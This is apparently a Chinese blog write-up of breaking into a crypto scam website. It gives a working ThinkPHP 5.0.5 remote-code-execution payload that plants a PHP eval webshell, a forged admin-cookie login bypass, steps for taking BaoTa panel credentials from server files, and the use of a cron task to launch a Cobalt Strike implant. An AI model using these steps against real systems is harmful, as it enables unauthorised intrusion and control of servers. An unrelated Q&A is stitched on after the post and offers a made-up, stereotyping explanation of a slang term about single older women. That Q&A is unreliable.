记一次某杀猪盘渗透测试

最近偶然发现一个虚拟货币买涨跌的杀猪盘,遂进行了一波测试,前台长这样。

图片

为thinkphp5.0.5随用RCE进行打入,成功写入webshell。

s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))

查看发现phpinfo信息发现已经禁用所有能够执行系统命令的函数,且com和dl加载都不能用无法执行相应的系统命令如下所示:

图片

assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open
//php如上系统命令都已禁用

但有文件的读写权限没有禁用assert(),file_put_contents()等函数,查看后发现为windows系统如下所示:

图片

由于php执行系统命令的函数都被禁用了,从而导致无法执行系统命令很难受。之后下载了他的网站源码简单看了一波,发现其管理员cookie固定且可以伪造如下所示看着像后门:

图片

故可后台登录绕过,管理员cookie固定,添加cookie字段即可登录绕过。浏览器f12,在cookie中添加上述键值访问index,即可成功后台登录如下所示好多钱(被骗的人好多):

图片

前台询问客服了解到转账账户(该杀猪盘运作方式是用户将钱打入客服提供的账号后,用户再在自己的账号冲入相应数值的资金至后台审核,审核后即可使用该数值的钱进行货币的涨跌投资买卖交易),留作证据上交:

图片

由于之前一直无法执行系统命令,想要突破一下就开始翻他服务器上的文件,翻阅系统文件发现存在宝塔的文件夹,探测发现确实开放8888端口存在宝塔服务但默认登录入口已被修改,如下所示:

图片

翻阅宝塔文件发现存储路径的文件名admin_path.pl,如下所示:

图片

找到宝塔登录入口,成功访问该登录入口,如下所示:

图片

继续翻阅发现一个default.pl的文件,该文件中存放的是相应的登录密码:

图片

拿到密码尝试了默认用户名发现不对不能登录,继续翻文件default.db文件是记录登录记录的,找到登录账号:

图片

利用账号密码成功登录宝塔管理后台,如下所示:利用账号密码成功登录宝塔管理后台,如下所示:

图片

找到定时任务处修改计划任务执行cs上线马,上线后在将计划任务改回如下所示:

图片

cs成功上线如下所示:

图片

查看ip仅有公网地址无内网,同C段还有其他几台部署的都是同一套东西就不在往下搞了:

图片

总的就这样,没啥东西比较无味

转载于原文链接:
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
### 回答1: "大龄剩女"这个词指的是年龄相对较大的单身女性。在中国,由于传统文化的影响,社会对于女性的婚姻压力较大,因此很多年龄相对较大的单身女性会被称为"剩女"。而这些"剩女"会被称为"盘",是因为社会上有人认为她们已经不太可能再找到伴侣了,就像是盘上的肉一样,被视为没有多大价值。 ### 回答2: 大龄剩女之所以容易成为盘的受害者,主要是因为她们在婚姻和恋爱市场上面临着一些困难和挑战。 首先,社会对于女性的婚姻年龄有着一定的期望。随着年龄的增长,女性面临着压力来尽早结婚,而一些大龄剩女可能因各种原因未能按社会预期时间内完成婚姻,这使她们更容易成为盘的目标。 其次,大龄剩女在婚恋市场上面临着较少的选择。随着年龄的增长,她们可能会发现自己处于相对劣势的位置,因为男性更倾向于选择年轻的女性作为伴侣。这使得一些大龄剩女可能会感到焦虑,急于找到合适的伴侣,从而容易受到盘的欺骗。 最后,一些大龄剩女可能由于缺乏婚姻经验或情感上的渴望而更容易被骗。由于一些大龄剩女可能没有经历过婚姻,对于婚恋关系的判断和预期可能会相对较为不成熟,容易被盘以虚假的承诺和甜言蜜语蒙骗,导致财务上的损失。 综上所述,大龄剩女容易成为盘的受害者主要是由于社会对女性婚姻年龄的期望、婚恋市场上的选择局限以及缺乏婚姻经验和情感上的渴望等因素所导致的。为了保护自身利益,大龄剩女需要保持警惕,提高自身的婚恋意识和充实自己的生活,选择信任可靠的平台和人,避免成为盘的受害者。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试中心

各位师傅,觉得文章不错可支持下

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值